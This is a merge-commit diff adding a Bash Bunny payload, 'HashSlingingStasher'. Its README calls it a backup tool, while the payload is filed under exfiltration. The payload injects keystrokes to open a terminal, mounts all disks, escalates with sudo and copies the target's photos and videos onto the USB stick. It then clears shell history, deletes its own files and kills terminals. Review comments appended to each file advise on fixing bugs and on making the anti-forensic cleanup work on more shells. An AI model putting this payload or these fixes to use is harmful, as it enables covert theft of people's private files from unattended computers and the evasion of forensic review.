Merge pull request #667 from theSW4n/master

HashSlingingStasher (HSS) Submission
This commit is contained in:
Peaks
2025-02-04 11:02:20 -05:00
committed by GitHub
5 changed files with 348 additions and 0 deletions

View File

@@ -0,0 +1,85 @@
<pre>
NNNNNNNNNNNNNNNX0kxol:;'..... ...,:lkKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNN0xl:,.. .,:o0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNOl'. .,xXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNKo. .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNN0: .cKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNK; .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNXc .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNo. ,ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNO' .lXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNXc ;0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNO' 'ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNo .;ccccccccccllloodxOXNNNNNNNNNNNNNN
NK; ..... .cKNNNNNNNNNNNNN
NO' .xNNNNNNNNNNNNN
Nx. H A S H . ... .ONNNNNNNNNNNNN
Nd. ...... ..... lXNNNNNNNNNNNNN
Nl S L I N G I N G ...... ... ;0NNNNNNNNNNNNNN
Xc .. ,ONNNNNXK0KXNNNNN
K; S T A S H E R .cKNNNNN0dc;:cldkKX
K, .:kXNNNNXxcdd:co:,,:o
O' by .;o0XNNNNNKocddcd0x::c;;
k. ....',:ldkKNNNNNNNNOccoclkkl:oxl:x
x. theSW4n .l0KKXNNNNNNNNNNNNNKl,:;lko:ldl:lOX
d .lXNNNNNNNNNNNNNNNNX0o,,:::ol;cxKNN
l .:ok0XXXK0OxdldKNNKxlldoc:;cxKNNNN
c ..,;,'.. ;xdcoOXNNK00XNNNNNN
; .:OXNNNNNNNNNNNNNN
, lNNNNNNNNNNNNNNNN
' cXNNNNNNNNNNNNNNN
. .':o0NNNNNNNNNNNNNNNN
. .. ..''''',;:cox0XNNNNNNNNNNNNNNNNNNN
.. .xNXXXXNNNNNNNNNNNNNNNNNNNNNNNNNNN
... .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
.... .xNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
. .... .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Ko. ...... .';cd0XNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Nk,. .oKk, ....';:col. .;OXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNXOdl;.. 'ONNd. ....';cxXNl .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNXOxl;oXNN0:.... .....',:xXN0l,........';dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNXXNNNNXK0OOOOO00KXXNNNNNNXXKKKKKKXXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
</pre>
HSS is a data backup tool for MacOS and Linux targets (tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3) (not compatible with Windows). It is designed to find and copy user defined file types/sizes to the udisk on the Bash Bunny, and keep track of them using checksums. This allows the user to scan, stop, and revisit the target to resume copying only new files, skipping those previously copied.
# Instructions
If using a MicroSD XC card for your Bash Bunny Mark II, format it using FAT32 and name it "BashBunny".
Variables/options are set in payload.txt. By default, the script will recursively search the root directory of the target OS for image and video file extensions and copy only files greater than 10KB in size.
Copy the payload.txt and hss_bbscript.sh into the payload/switch folder on the Bash Bunny. If you have an existing checksums.txt file (a list of checksums for files which have been copied previously) you want to use, make sure to copy it to .../BashBunny/loot/hss/ on the Bash Bunny as well (or on the SD card if applicable). The list should contain one CRC-32 checksum per line.
Backup checksums.txt after running HSS and name it something specific so that you know which target it corresponds to. You probably wouldn't want to use the same list on multiple targets, especially if there is a low chance of them containing the same files, because the script will take longer to parse the irrelevant checksums from the existing list. But this depends on your use case. If you want to return to a specific target at a later time, just copy and rename the corresponding checksums file back to "checksums.txt" in the loot directory, and pick up where you left off (looking for new/modified files).
If the script completes its scan of the target system, it will create a file called "nosferatu" in the loot directory. Otherwise you may simply come back and run the HSS script again to resume scanning at any time. nosferatu is deleted at the beginning of each scan, if it exists on the Bash Bunny already.
Unplug the Bash Bunny device when the script is finished, or at any time if you wish to return and finish later. You may now move the files off of the device for storage elsewhere, if desired. Leave the checksums.txt file inside the loot directory on the device if the script did not complete. The script will pick up where it left off, skipping over any files that were copied before (as long as checksums.txt is left on the device).
# Nuances
The tool will attempt to mount all connected disks and run as super user if possible (better results), unmounting whatever was not previously mounted before, once the script completes.
If an unsupported filesystem is connected, you may instead run the script from a bootable USB OS attached to the target, which supports the desired filesystem.
MacOS Time Machine backups and hidden ".Trashes" folders can not be accessed by running this script from the local machine running MacOS, unless full disk access has been granted to the termial application. You can do this relatively quickly (if you have the password to the user logged in) by pressing command + space, type "full disk access" and press return, then click the toggle to enable Terminal if it is not already enabled. Don't forget to turn it off afterwards if you go this route.
If you unplug the Bash Bunny before the script finishes, and then modify payload.txt, you will have to manually delete the .../BashBunny/HSS directory for the changes to take effect.
# LED Status Indicators (Standard)
SETUP.... Magenta solid
ATTACK... Yellow single blink
FINISH... Green 1000ms VERY FAST blink followed by SOLID
# hss_checksummer.sh
### To manually generate or update your checksum list for files which you have already copied
Manually run this script in the parent directory above a directory called "backup" containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run.
# hss_cleanup.sh
### To manually perform cleanup functions on the loot directory
Manually run this script inside the .../loot/hss/ directory to unhide hidden files, and sort files into directories based on their file extension inside the loot directory.
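Review bot: the README's paths and indicator files do not match the script in this commit: the `# hss_checksummer.sh` section says copies land in `.../loot/hss/backups/`, but hss_bbscript.sh creates and writes to `./backup` (`mkdir ./backup`, `cp "$p" "./backup/"`), and the `disk_drive_full` marker the script touches when a copy fails is not documented anywhere, only `nosferatu` is. Make the directory name consistent and add `disk_drive_full` to the Instructions or Nuances section, noting that any failed `cp` produces it, not only a full drive. Two smaller points: the README describes HSS as a "data backup tool" while payload.txt files it under `Category: Exfiltration`; say so plainly in the README, since the payload mounts every attached disk, tries to run as root, clears shell history and kills the terminal, which is not what a reader expects from a backup tool. Also "termial" in the Full Disk Access paragraph should be "terminal", and Apple's spelling is "macOS".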

View File

@@ -0,0 +1,76 @@
#!/bin/bash
# Variables (defined by user in payload.txt)
mountpt=$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)
lootdir=$mountpt/loot/hss
###### Create loot directory and remove nosferatu if it already exists, which serves as the indicator whether or not the script has fully completed in the past ######
mkdir -p $lootdir
cd $lootdir
rm nosferatu
mkdir ./backup
touch ./checksums.txt
chmod 777 ./backup/ ./checksums.txt
mounted=" "
mntdir=" "
###### Mount all unmounted, connected drives and store theier device name to unmount them again at the end of the script ######
# For MacOS
if uname | grep -i darwin; then for i in `ls /dev | awk -v s="disk" 'index($0, s) == 1'`; do if diskutil info $i | grep -i "Mounted" | grep -qi "Yes"; then :; else mounted+="$i " && diskutil mountDisk $i; fi; done; fi
# For Linux
if uname | grep -i darwin; then :; else
partitions=$(lsblk -o NAME,MOUNTPOINT -nr)
while IFS= read -r line; do
name=$(echo "$line" | awk '{print $1}')
mountpoint=$(echo "$line" | awk '{print $2}')
# Check if the partition is not mounted
if [ -z "$mountpoint" ]; then
# Attempt to mount the partition
udisksctl mount -b "/dev/$name" && mounted+="/dev/$name "
fi
done <<< "$partitions"
fi
###### Find all files under a given directory of a given size and filetype, copy the files to a folder on the USB drive, and save their checksums to a running list ######
find "$target_directory" -path "$mountpt/loot/hss" -prune -o -size $find_file_size -type f \( -name "" `for i in ${target_extensions[@]}; do echo "-o -iname "*.$i" "; done` \) -exec echo {} ';' | while read p; do
if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`; then
:
else
if [ -f "./backup/${p##*/}" ]; then
cp "$p" "./backup/`cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`_${p##*/}"
if [ $? -ne 0 ] ; then
# Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script
touch ./disk_drive_full
if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
exit 1
else
echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt
fi
else
cp "$p" "./backup/"
if [ $? -ne 0 ] ; then
# Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script
touch ./disk_drive_full
if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
exit 1
else
echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt
fi
fi
fi
done
###### Unmount only the disks that were mounted at the beginning of the script, and provide indication that the script completed successfully ######
if [ $? -ne 0 ] ; then
:
else
if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
touch nosferatu
fi
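Review bot: nothing checks that `mountpt` was actually found before `mkdir -p $lootdir` and `cd $lootdir`: if `mount | grep -i $DRIVE_LABEL` matches nothing (or more than one line, since the grep is case-insensitive and unanchored), `lootdir` becomes `/loot/hss` or a multi-word path; a root run will then quietly create `/loot/hss` on the target's own root filesystem and write the copies and checksum list there, while a non-root run fails the `cd`, writes everything into the current directory (`/tmp/HSS`), and the payload's later `rm -rf /tmp/HSS` deletes the loot. Exit with a non-zero status if `[ -z "$mountpt" ]` or the `cd` fails, quote `"$DRIVE_LABEL"` and `"$mountpt"`, and prune the whole udisk (`-path "$mountpt" -prune`) rather than only `loot/hss`, or the payload's own `HSS` copy and anything else on the Bunny gets scanned and copied back onto itself. Other points in this file: the dedup key is a POSIX `cksum` CRC computed up to three times per file (in the `grep -qw` test, again in the `cp` target name, again in the `echo ... >> ./checksums.txt`); compute it once into a variable, and since a 32-bit CRC is not collision-resistant, two different files with the same CRC are silently skipped, so a `shasum -a 256` / `sha256sum` digest is a safer key for a list that is meant to grow across revisits. Every `cp` failure is treated as a full drive (`touch ./disk_drive_full` then `exit 1`), but as a non-root user or under macOS TCC the common failure is a permission error on a single file, which aborts the whole run; check the error (or `df` on `$mountpt`) and skip unreadable files instead. Note also that `exit 1` inside the `find ... | while read p` pipeline only leaves the subshell, so the script itself still ends with status 0 and the caller cannot tell the run failed. The `-exec echo {} ';' | while read p` loop breaks on names with leading or trailing whitespace or newlines and strips backslashes; use `-print0` with `while IFS= read -r -d '' p`. Minor: `mntdir` is assigned and never used, `rm nosferatu` should be `rm -f`, and `uname | grep -i darwin` prints "Darwin" to the terminal on every test; add `-q`.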

View File

@@ -0,0 +1,5 @@
#!/bin/bash -x
# Run this script in the parent directory above the "backup" folder containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run.
find ./backup | while read p; do if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1`; then : ; else echo `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1` >> ./checksums.txt; fi; done
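Review bot: `find ./backup` without `-type f` feeds `./backup` itself and every subdirectory (the per-extension folders hss_cleanup.sh creates) to `cksum`, which fails on a directory; the empty command substitution then leaves `grep -qw` with no pattern, the test fails, and `echo` appends a blank line to checksums.txt for each directory. Use `find ./backup -type f`. The same `while read p` loop has the whitespace and backslash problems noted for hss_bbscript.sh (`-print0` / `read -r -d ''`), `cksum` runs twice per file, and `cat ./checksums.txt` errors when the list does not exist yet (`touch` it first, as the main script does). Also `#!/bin/bash -x` leaves xtrace on for what the README presents as a user-run utility; drop `-x`.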

View File

@@ -0,0 +1,7 @@
#!/bin/bash -x
# Run this script inside the .../loot/hss/ directory to perform cleanup functions on the loot directory: unhide hidden files, and sort files into directories based on their file extension
find ./backup/ -type f -name '\.*' -print | while read p; do mv $p ./backup/`echo $p | cut -b 11-`; done
ls ./backup/ | while read p; do mkdir ./backup/"${p##*.}"; done
ls ./backup/ | while read p; do mv ./backup/"$p" ./backup/"${p##*.}"/; done
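Review bot: the sort step breaks on files without an extension and collides with its own output: for a name with no dot, `${p##*.}` is the whole filename, so `mkdir ./backup/"${p##*.}"` fails because a file of that name exists, and `mv ./backup/"$p" ./backup/"$p"/` then fails as well; the second `ls` also lists the directories just created and tries to move each into itself. Use `find ./backup -maxdepth 1 -type f` instead of `ls`, skip names with no dot, use `mkdir -p`, and lower-case the extension so `JPG` and `jpg` (the main script matches with `-iname`) end up in one directory. In the unhide line, `mv $p ./backup/\`echo $p | cut -b 11-\`` relies on the prefix `./backup/.` being exactly ten bytes and on `$p` containing no whitespace; a quoted `"${p#./backup/.}"` does the same without the byte count, and `mv -n` (or an existence check) stops a hidden `.photo.jpg` from silently overwriting an existing `photo.jpg`. Drop `-x` from the shebang as in hss_checksummer.sh.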

View File

@@ -0,0 +1,175 @@
# Title: Hash Slinging Stasher for Bash Bunny
# Description: Copies files to Bash Bunny udisk from the target OS matching given extensions and file size only if their checksum does not appear in a user defined or generated checksum list, and appends the checksum of copied files to that list.
# Author: theSW4n
# Version: 1.0
# Category: Exfiltration
# Target: Tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3 (not compatible with Windows)
# Attackmodes: HID, Storage
# Options
hss_target_directory=/
hss_target_extensions="jpg jpeg gif bmp raw webp psd orf rw2 flv webm ogg h264 hevc heic heif dng cr2 tiff crw nef pef mov qt mp4 m4p m4v mpg mpe mpv m2v svi 3gp 3g2 mpeg avi wmv mts m2ts ts png"
hss_find_file_size=+10k
DRIVE_LABEL="BashBunny"
######## SETUP PHASE ########
LED SETUP
GET SWITCH_POSITION
mount /dev/nandf /root/udisk
rm -rf /root/HSS
cp -r /root/udisk/payloads/${SWITCH_POSITION} /root/HSS
sync
umount /dev/nandf
udisk mount
mv -f /root/HSS /root/udisk/HSS
sync
udisk umount
ATTACKMODE HID STORAGE
######## ATTACK PHASE ########
LED ATTACK
QUACK GUI SPACE
QUACK GUI
QUACK STRING "terminal"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "qterminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "gnome-terminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "xterm"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "konsole"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "lxterminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "urxvt"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "st"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "alacritty"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "xfce4-terminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "tilda"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "udisksctl mount -b /dev/disk/by-label/$DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "cp -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS /tmp"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "chmod -R 755 /tmp/HSS"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "cd /tmp/HSS"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "/bin/bash"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "target_directory=$hss_target_directory"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export target_directory"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "target_extensions=\""$hss_target_extensions\"""
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export target_extensions"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "find_file_size=$hss_find_file_size"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export find_file_size"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "DRIVE_LABEL=$DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "if [ \""\$EUID\"" -ne 0 ]; then \$(find ~+ -name"
QUACK STRING " \""hss_bbscript.sh\""); else \$(sudo \$(find ~+ -name"
QUACK STRING " \""hss_bbscript.sh\"")); fi"
QUACK ENTER
QUACK DELAY 1000
sync
QUACK STRING "exit"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export HISTIGNORE=\""*\"""
QUACK ENTER
QUACK DELAY 500
QUACK STRING "cd /"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "rm -rf /tmp/HSS"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "rm -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "udisksctl unmount -b /dev/disk/by-label/$DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "diskutil eject \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "unset target_directory & unset target_extensions & unset find_file_size & unset DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "history -c && history -w"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "killall qterminal & killall gnome-terminal- & killall Terminal & killall xterm & killall konsole & killall lxterminal & killall urxvt & killall st & killall alacritty & killall xfce4-terminal & killall tilda"
QUACK ENTER
QUACK DELAY 500
sync
LED FINISH
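Review bot: the privilege test is inverted relative to the README's "run as super user if possible": `if [ "$EUID" -ne 0 ]; then $(find ~+ -name "hss_bbscript.sh"); else $(sudo ...)` runs the script without `sudo` exactly when the shell is not root, and wraps it in `sudo` only when it already is. If that is deliberate, to avoid a password prompt that would swallow the queued keystrokes, say so in the README and drop the dead `sudo` branch; otherwise swap the branches, and in either case call `./hss_bbscript.sh` directly rather than executing the output of `find` through `$(...)`, which in the `sudo` branch also tries to execute the script's stdout as a command. Second, the `QUACK DELAY 1000` after launching the script is far shorter than a scan of `/`: everything after it (`exit`, `export HISTIGNORE`, both `rm -rf`, the unmount and eject, `killall`) is typed into the terminal's input buffer while the copy is still running and executes the moment the script returns, and `LED FINISH` lights a few seconds later, so the FINISH state in the README does not mean the copy has finished. Document that the operator must wait for the terminal (or `nosferatu`), and note that the eject runs before anyone can look for `disk_drive_full`. Third, the anti-forensics lines act on the wrong shell: the exported variables and the script invocation were typed into the inner `/bin/bash`, which appends them to its history on `exit` before `export HISTIGNORE="*"` is set in the outer shell; on bash targets the later `history -c && history -w` overwrites the file anyway, but `history -c` and `HISTIGNORE` are bash-specific, so on macOS 13/14 and Kali, whose default interactive shell is zsh, the outer shell's `udisksctl`, `cp`, `chmod`, `rm -rf` and `killall` lines stay in the zsh history and the inner bash's `~/.bash_history` is never touched. Setting `HISTFILE=` and `HISTIGNORE` before starting the inner bash, and doing the cleanup inside it, would be consistent across both shells. Minor: `unset a & unset b & ...` backgrounds each `unset` in a subshell and so unsets nothing (use `;`), and the terminal-emulator spray (`qterminal`, `gnome-terminal`, ... each followed by `n`) opens a second window on any system where that emulator exists, with the remaining keystrokes going to whichever window then has focus; launching one known terminal per detected OS would be more predictable.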